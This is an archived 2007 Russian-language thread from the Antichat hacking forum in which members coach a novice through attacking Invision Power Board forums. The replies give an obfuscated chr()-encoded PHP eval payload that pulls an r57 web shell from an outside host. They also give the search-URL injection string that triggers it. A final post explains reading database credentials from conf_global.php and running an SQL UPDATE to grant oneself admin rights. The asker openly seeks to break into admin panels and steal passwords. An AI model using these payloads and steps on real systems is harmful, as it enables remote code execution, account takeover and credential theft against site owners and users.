ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.01.2007, 12:21
|
|
Новичок
Регистрация: 16.12.2006
Сообщений: 17
Провел на форуме:
82584
Репутация:
3
|
|
Сообщение от aka PSIH
шелл заинклудится
И как проверить заинклюдился шелл или нет?
|
|
|
21.01.2007, 12:22
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
как как, ты его увидешь...
|
|
|
|
21.01.2007, 12:25
|
|
Новичок
Регистрация: 16.12.2006
Сообщений: 17
Провел на форуме:
82584
Репутация:
3
|
|
Сообщение от aka PSIH
как как, ты его увидешь...
Можешь пожалуйста объяснить подробнее. Вот я в строке поиска ввел что надо, нажал интер и что дальше делать? плиз ты же умный ) помоги
|
|
|
|
21.01.2007, 12:29
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Заходишь на форум IPB, создаешь тему в которой пишешь код(в каиором зашифрована ссылка на шелл r57), затем в поиске ищешь r57ipbxplhohohoeval, затем в адресной строке браузера удаляешь все, что написано после searchid, и заменяешь на &search_in=posts&result_type=posts&highlite=r57ipb xplhohohoeval&lastdate=z|eval.*?%20//)%23e%00
И у тебя в браузере открываеться r57 шелл(если форум бажный)
|
|
|
|
21.01.2007, 12:32
|
|
Новичок
Регистрация: 16.12.2006
Сообщений: 17
Провел на форуме:
82584
Репутация:
3
|
|
Сообщение от aka PSIH
Заходишь на форум IPB, создаешь тему в которой пишешь код(в каиором зашифрована ссылка на шелл r57), затем в поиске ищешь r57ipbxplhohohoeval, затем в адресной строке браузера удаляешь все, что написано после searchid, и заменяешь на &search_in=posts&result_type=posts&highlite=r57ipb xplhohohoeval&lastdate=z|eval.*?%20//)%23e%00
И у тебя в браузере открываеться r57 шелл(если форум бажный)
hohoho Точно hohoho? просто с твоей прогой получается hihihi
|
|
|
|
21.01.2007, 12:33
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
точно, замени на hohoho
|
|
|
|
21.01.2007, 12:40
|
|
Новичок
Регистрация: 16.12.2006
Сообщений: 17
Провел на форуме:
82584
Репутация:
3
|
|
Сообщение от aka PSIH
точно, замени на hohoho
Теперь ни че не происходит. То есть я заменяю все после search_in, жму интер, окно обновляется и опять открывается поиск.
Может шелл не так залил, может хостинг фигня...
Можешь мне дать адрес твоего шелла, если он есть у тебя?
|
|
|
|
21.01.2007, 13:42
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
О. сколько раз на форуме перетирался этот вопрос!
1) Рабочий шелл
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );//
2) тему надо создавать новую, с легким названием.
3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения"
4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00
5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
22.01.2007, 20:54
|
|
Новичок
Регистрация: 16.12.2006
Сообщений: 17
Провел на форуме:
82584
Репутация:
3
|
|
Сообщение от Constantine
О. сколько раз на форуме перетирался этот вопрос!
1) Рабочий шелл
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );//
2) тему надо создавать новую, с легким названием.
3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения"
4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00
5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен
Спасибо. И не скажете команды что б в админку залесть или пас украсть? А то просто не хочу все команды подряд перебирать и я не очень шарю в этом
|
|
|
|
23.01.2007, 00:14
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от 3a6bI/\
Спасибо. И не скажете команды что б в админку залесть или пас украсть? А то просто не хочу все команды подряд перебирать и я не очень шарю в этом
Я поражаюсь зачем тебе админка, если есть шелл,хотя чему тут удивляться сам таким был  но я все таки попробую тебе объяснить один из способов как попасть в нее, если разумеется у тебя есть шелл.Для начала зарегистрируй юзера и запомни его id, далее надо выдернуть записи из файла forum/conf_global.php
$INFO['sql_database']='............;
$INFO['sql_driver']= '.............';
$INFO['sql_host']='.........';
$INFO['sql_pass']= '............';
$INFO['sql_user']='..............';
Потом в самом низу шелла есть: Выполнение SQL запроса туда вставляешь те данные которые ты вытянул из conf_global.php в сам запрос ставишь
UPDATE ibf_members SET mgroup=4 WHERE id=ид твоего юзера, и все ты админ, можешь топать в админку.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
